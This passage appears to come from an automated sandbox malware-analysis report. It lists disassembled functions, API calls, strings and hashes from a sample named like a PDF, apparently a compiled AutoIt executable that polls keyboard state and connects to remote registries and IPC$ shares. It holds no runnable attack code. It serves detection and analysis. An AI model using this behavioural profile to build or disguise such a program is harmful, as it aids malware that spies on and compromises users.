                              • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                              • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                              Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                              Download Yara Rule
                              APIs
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                              • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                              • _wcslen.LIBCMT ref: 004610A3
                              • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                              • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                              • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                              • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                              • GetWindowRect.USER32(?,?), ref: 00461248
                                • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                              • String ID: ThumbnailClass
                              • API String ID: 4136854206-1241985126
                              • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                              • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                              • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                              Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                              Download Yara Rule
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                              • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                              • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                              • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                              • GetClientRect.USER32(?,?), ref: 00471A1A
                              • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                              • String ID: 2
                              • API String ID: 1331449709-450215437
                              • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                              • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                              • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                              Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                              Download Yara Rule
                              APIs
                              • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                              • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                              • __swprintf.LIBCMT ref: 00460915
                              • __swprintf.LIBCMT ref: 0046092D
                              • _wprintf.LIBCMT ref: 004609E1
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                              • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                              • API String ID: 3054410614-2561132961
                              • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                              • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                              • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                              Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                              • CLSIDFromString.OLE32(?,?), ref: 004587B3
                              • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                              • RegCloseKey.ADVAPI32(?), ref: 004587C5
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                              • API String ID: 600699880-22481851
                              • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                              • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                              • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                              Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: DestroyWindow
                              • String ID: static
                              • API String ID: 3375834691-2160076837
                              • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                              • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                              • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                              Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                              Download Yara Rule
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                              • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ErrorMode$DriveType
                              • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                              • API String ID: 2907320926-3566645568
                              • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                              • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                              • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                              Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                              • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                              • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                              • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                              • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                              • DeleteObject.GDI32(00430000), ref: 00470A04
                              • DestroyIcon.USER32(005C003A), ref: 00470A1C
                              • DeleteObject.GDI32(351438E6), ref: 00470A34
                              • DestroyWindow.USER32(005C006C), ref: 00470A4C
                              • DestroyIcon.USER32(?), ref: 00470A73
                              • DestroyIcon.USER32(?), ref: 00470A81
                              • KillTimer.USER32(00000000,00000000), ref: 00470B00
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                              • String ID:
                              • API String ID: 1237572874-0
                              • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                              • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                              • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                              Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                              Download Yara Rule
                              APIs
                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                              • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                              • VariantInit.OLEAUT32(?), ref: 004793E1
                              • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                              • VariantCopy.OLEAUT32(?,?), ref: 00479461
                              • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                              • VariantClear.OLEAUT32(?), ref: 00479489
                              • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                              • VariantClear.OLEAUT32(?), ref: 004794CA
                              • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                              • String ID:
                              • API String ID: 2706829360-0
                              • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                              • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                              • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                              Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                              Download Yara Rule
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044480E
                              • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                              • GetKeyState.USER32(000000A0), ref: 004448AA
                              • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                              • GetKeyState.USER32(000000A1), ref: 004448D9
                              • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                              • GetKeyState.USER32(00000011), ref: 00444903
                              • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                              • GetKeyState.USER32(00000012), ref: 0044492D
                              • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                              • GetKeyState.USER32(0000005B), ref: 00444958
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: State$Async$Keyboard
                              • String ID:
                              • API String ID: 541375521-0
                              • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                              • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                              • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                              Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: InitVariant$_malloc_wcscpy_wcslen
                              • String ID:
                              • API String ID: 3413494760-0
                              • Opcode ID: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                              • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                              • Opcode Fuzzy Hash: 6d788ec2be1997d9cec64eaa256864158e09ad3f6105efb05e468561ef8a9f6c
                              • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                              Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AddressProc_free_malloc$_strcat_strlen
                              • String ID: AU3_FreeVar
                              • API String ID: 2634073740-771828931
                              • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                              • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                              • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                              • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                              Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                              Download Yara Rule
                              APIs
                              • CoInitialize.OLE32 ref: 0046C63A
                              • CoUninitialize.OLE32 ref: 0046C645
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                              • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                              • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                              • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                              • IIDFromString.OLE32(?,?), ref: 0046C705
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                              • API String ID: 2294789929-1287834457
                              • Opcode ID: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                              • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                              • Opcode Fuzzy Hash: 8665205133a3f3d83065b0d9f42e266eef00d51d9f24292ab734099309a65fda
                              • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                              Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                              • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                              • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                              • ImageList_EndDrag.COMCTL32 ref: 00471169
                              • ReleaseCapture.USER32 ref: 0047116F
                              • SetWindowTextW.USER32(?,00000000), ref: 00471206
                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.1381461965.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000006.00000002.1381447340.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381500994.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381518159.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381574357.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381593153.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000006.00000002.1381684928.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_400000_Product Data Specifications_PDF.jbxd
                              Similarity
                              • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                              • API String ID: 2483343779-2107944366
                              • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                              • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                              • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                              • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
